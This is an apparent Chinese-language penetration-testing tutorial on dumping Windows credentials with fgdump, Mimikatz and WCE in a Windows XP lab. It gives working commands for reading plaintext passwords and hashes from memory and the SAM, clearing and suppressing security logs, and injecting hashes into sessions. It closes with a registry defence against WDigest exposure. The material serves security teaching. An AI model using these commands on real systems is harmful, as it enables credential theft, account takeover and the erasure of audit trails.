Kali Linux渗透测试之提权（二）——Fgdump、Mimikatz、WCE_渗透测试猕猴桃工具

一、、Windows身份认证的过程

1. 在登录窗口输入账号和密码后，winlogon.exe会将输入的密码进行lmhash和nthash加密；
2. 然后将加密后的密码与SAM账户数据库进行比对，如果比对匹配，则成功登录操作系统（本地登录）；
3. 如果网络中的一台主机尝试远程登录另一台主机，登录的账号和密码也是通过本地计算机将输入的密码进行lmhash和nthash计算，然后将加密后的密文通过网络传输到目标主机；
4. 虽然输入是明文密码，但是不论是本地登录还是远端登录操作系统，密码都是以密文的形式进行传输，且对hash进行逆向计算，所得到的结果是不唯一的，所以相对安全。当然也可以用hash碰撞的方式进行爆破。
   .

注：如果是本地登录，身份验证服务器端会有NTLM安全包接收请求，对它进行处理。 在登陆的目标服务系统后，有一个wdigest安全包，直接从内存总读取当前用户信息，在本地缓存一个明文密码，当注销登陆后，该账户信息会被删除；如果一直处在登录状态，默认情况下操作系统会一直将这个明文密码保存在内存中。

二、fgdump工具

2.1> fgdump是集成在kali上的Windows工具，可以下载到Windows XP上使用；

2.2> 利用wget命令将，从windows XP上网页浏览器登录将fgdump拷贝到windows XP桌面；

2.3> 双击下图所示的fgdump程序,可以得到如下三个文件，其中一个包括账户和加密的密码文件；

2.4> 获取到加密的密码后，可以通过Kali集成的工具进行hash碰撞得到密码。

三、mimikatz（猕猴桃）工具

• Mimikatz是Kali上集成的Windows工具，存放路径：usr/share/mimikatz；
• Mimikatz工具是由俄罗斯人写的，用法跟其他的工具不太一样；
• 将该工具拷贝到Windows XP上；

在cmd命令窗口下，进入mimikatz文件所在路径后，输入命令 ’ mimikatz.exe '，进入mimikatz的工作界面。

如下图所示：进入mimikatz.exe页面；

1、:: #查看帮助信息；

2、privilege::debug #提升权限；

3、sekurlsa::logonPasswords #查看当前登录的账户和明文密码；

如果登录切换另外的账户；可以查看切换后登录账户的用户名和明文密码；

4、process模块

4.1> process:: #查看可以执行的子模块

4.2> process::list #查看进程列表

4.3> process::start calc #开启一个计算机进程

4.4> process::lsadump #挂起进程：可用于植入木马时，暂停防病毒软件等；

这里就不演示了

5、lsadump模块

5.1> lsadump:: #查看lsadump的帮助信息

5.2> lsadump::sam #从SAM数据库中读取账号密码，在XP中不成功，但在WIN7、win8中可能成功;

6、event模块

6.1> event:: #查看event模块的帮助信息

6.2> event::clear #清除操作系统的安全日志;

6.3> event::drop #不再产生新的日志

7、misc模块

7.1> misc:: #查看misc模块的帮助信息;

7.2> misc::cmd #新启动一个cmd

8、token模块

8.1> token:: #查看token模块的帮助信息;

8.2>token::whoami

四、WCE（Windows credential editor）——Windows身份验证信息编辑器

• WCE是一款功能强大的windows平台内网渗透的工具，使用WCE必须要有管理员的权限；
• 它集成在kali的工具包的windows程序中，可以共享给winXP；它可以列举登陆会话，并且可以添加、改变和删除相关凭据（例如：LMhashes和NThashes）。这些功能在内网渗透中能够被利用，例如，在windows平台上执行绕过hash或者从内存中获取NT/LM hashes（也可以从交互式登陆、服务、远程桌面连接中获取）以用于进一步的攻击。可以查看系统当前登陆用户的登陆密码的密文形式和明文形式。

• 将wce-universal.exe（路劲为：/usr/share/wce）工具拷贝到Windows XP的桌面上；

• 查看windows XP当前系统中的账户信息；

1、wce-universal.exe -h #查看wce-universal.exe的帮助信息

2、wce-universal.exe -l #查看当前登录的账户和加密的密码，其中，计算机名也会被当做用户来处理；

3、wce-universal.exe -lv

• 查看登录状态用户的详细信息，包括LUID（LocallyUniqueIDentifier）本地唯一标识符，账户和加密后的密码等；
• 查看信息时，首先尝试安全模式，直接从内存中读取信息，读取失败后，会尝试注入模式（可能对系统造成损害）；

4、wce-universal.exe -d 0007C39Ah #删除一个指定会话；参数：LUID

5、wce-universal.exe -r #显示当前最新登录信息，5秒刷新一次；

6、wce-universal.exe -g 123.com #对指定的内容进行hash计算

7、 wce-universal.exe -w #以明文形式读取密码，最常用和实际的作用；

切记：这些用户时登录，正在运行的

8、修改用户的登录会话，将userX用户的登录会话修改成另外的一个zhangsan用户；（参考别人的）

wce-universal.exe -i 00062E85 -s chengqianqian:CHENGQIA-1275B1:B73A13E9B7832A35AAD3B435B51404EE:AFFFEBA176210FAD4628F0524BFE1942

五、防御WCE攻击

系统通过Digest Authentication Package维护明文密码，默认自启动，可在注册表（regedit）中关闭默认启动；

首先在CMD中输入regedit命令打开注册表编译器；

路径为：HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Security Package

修改后必须将程序重启！！！

可以看到在注册表中关闭维护明文密码之后，再次运行wce-universal.exe -w，不能获取任何的信息，并且系统会自动重启；